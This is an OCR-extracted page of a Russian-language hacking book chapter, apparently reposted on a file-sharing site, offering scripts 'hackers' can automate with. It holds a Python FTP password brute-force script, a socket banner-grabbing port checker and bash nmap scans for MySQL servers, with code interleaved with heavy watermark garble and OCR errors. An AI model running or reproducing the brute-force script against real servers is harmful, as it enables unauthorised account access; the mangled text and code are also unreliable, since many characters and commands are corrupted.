Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

книги хакеры / Колисниченко Д. Н. Хакинг на linux.pdf

Скачиваний:

Добавлен:

19.04.2024

Размер:

29.19 Mб

Скачать

☆

<<< < Предыдущая 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 5859 / 6059 60 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D									r
P						NOW!				o
P						NOW!
							'\al,11111 IИI l.illll\
				to	BUY
w Click				to							m
w Click											m
w
	w									o
	.								.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Хакеры - хоть и умные, но довольно ленивые. Если есть возможность что-то автоматизировать, то они это делают. В этой главе мы рассмотрим несколько скриптов, которые тебе обязательно пригодятся.

13.1. Взлом FTP

Для взлома FTP можно использовать Руthоn-библиотеку :ftplib для установки которой нужно ввести команду:

pip install ftplib apt-get install python-ftplib

Напишем скрипт (лист. 13.1), который устроит перебор паролей по списку паролей, хранящихся в файле. Имя пользователя, которого ты собрался взла мывать, как и путь к файлу с паролями скрипт запрашивает с клавиатуры.

11111- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - •- .

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P						NOW!					l .1a11a 1. . ( l,JIIIIIIIIIII
					BUY						"\
				to	BUY
w Click				to
w Click										m	13.1. Взлом FTP путем перебора паролей
	w								Листингo		13.1. Взлом FTP путем перебора паролей
w
	.							.c
		p					g
			df			n		e
				-xcha
								#! /usr/bin/pythonЗ
							import ftplib
							server =				input("Aдpec FТР-сервера: ");

user=input("им пользователя: "); Passwordlist=input("Bвeди путь к словарю > "); try:

with open(Passwordlist, 'r') as pw: for word in pw:

word=word. strip('\r') . strip( '\n') try:

ftp = ftplib.FTP(server) ftp.login(user,word)

print('Пapoль подобран: ' + word ) except:

print('работаем... ')

except:

рrint('Ошибка словаря')

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
1.111 \al,l'p,1					BUY	NOW!
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

13.2. Проверка портов

Проще всего для сканирования портов использовать nmap. Но если нуж но проверить только определенные порты и есть вообще желание немно го попроrраммировать на Python, тогда рассмотрим сценарий из листинга

13.2.Сценарий пробует подключиться к портам, указанным в списке Port

••.••. .•••••• --- •--------. --••.---------- - -- --------- - ---------- ------------ .. с. ---

hang

NOW!

BUY

Click

и вm

случае удачного подключения выводит ответ, полученный от сервераClick.

Как минимум, таким образом ты сможешь узнать версию ПО, "слушающе

-xcha

-x cha

го" данные порты.

Листинг 13.2. Проверка портов

#! /usr/bin/pythonЗ irnport socket

s = socket.socket() Port=[21,22,25,3306]

for i in range(0,4): s=socket.socket() Ports=Port[i]

print("Oтвeт сервера") print(Ports)

s.connect(("192.168.1.101", Ports)) answer = s.recv(1024)

print (answer) s. close()

print (answer)

13.3. Сканирование MySQL

Сценарий из листинга 13.3 позволит найти окружающие тебя MySQL cepвepы. Все, что тебе нужно сделать - указать другой диапазон IР-адресов. Данный скрипт запускает nmap, который выполняет сканирование диапазо•-

1111- -- -- - - - - - - - -- - --- - - - - - - - - - - . - - - - - - - - - - - - - - - - -- - - - - - - -- -- - --- - - -- -- - - - - - - -- - - - - - ..

hang

NOW!

BUY

Click

наm

IР-адресов на открытый порт 3306 (порт MySQL). Результаты записываClick

ются в файл MYSQLscan. Далее скрипт выводит этот файл и отфильтровы

-xcha

-x cha

вает результаты, показывая только открытые порты.

Листинг 13.3. Сканирование MySQL

# ! /Ьin/bash

nmap -sт 192.168.181.0/24-р 3306 >/dev/null -oG MYSQLscan

cat MYSQLscan I grep open > MYSQLScan2

cat MYSQLScan2

При желании этот скрипт можно усовершенствовать - чтобы он запрашивал начальный IР-адрес и последний октет последнего IР-адреса - тогда тебе не придется каждый раз модифицировать сценарий, когда тебе нужно будет просканировать другой диапазон.

Листинг 13.4. Модифицированная версия

#! /Ьin/bash

echo "Начальный IР-адрес: " read FirstIP

echo "Последний октет последнего IР-адреса, например, 255:" read LastIP

echo "Номер порта для сканирования:" read port

nmap -sт $FirstIP-$LastIP -р $port >/dev/null -oG MYSQLscan cat MYSQLscan I grep open > MYSQLScan2

cat MYSQLScan2

•	1111
. -- -- --- - --- - - - - - - - -- - - - - - - - - - - - - - - - - - - - -- - - - - - - - -- - - - -- - - --- - --- - ---- - - - -- - - - - -

<<< < Предыдущая 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 5859 / 6059 60 > Следующая >>>

Соседние файлы в папке книги хакеры

#
19.04.20249.61 Mб16Как_защитить_себя_в_цифровом_мире_.pdf
#
19.04.20244.58 Mб15Кевин Митник Призрак в сети.pdf
#
19.04.20242.68 Mб15кибербезопасность.pdf
#
19.04.202419.49 Mб17Кибербезопасность_стратегия_атак_и_обороны.pdf
#
19.04.2024396.03 Кб13Книга хакеры.pdf
#
19.04.202429.19 Mб17Колисниченко Д. Н. Хакинг на linux.pdf
#
19.04.20242.75 Mб15Криптография.pdf
#
19.04.202438.52 Mб17Курс_по_кибер_безопастности_Секреты_хакеров.pdf
#
19.04.20242.94 Mб16Линдер_Кани_Тим_Кук_Гений,_который_вывел_Apple_на_новый_уровень.pdf
#
19.04.202417.17 Mб18Майкл_Сикорски,_Эндрю_Хониг_Вскрытие_покажет!_Практический_анализ.pdf
#
19.04.20246.23 Mб16Михаил_Флёнов_Компьютер_глазами_хакера.pdf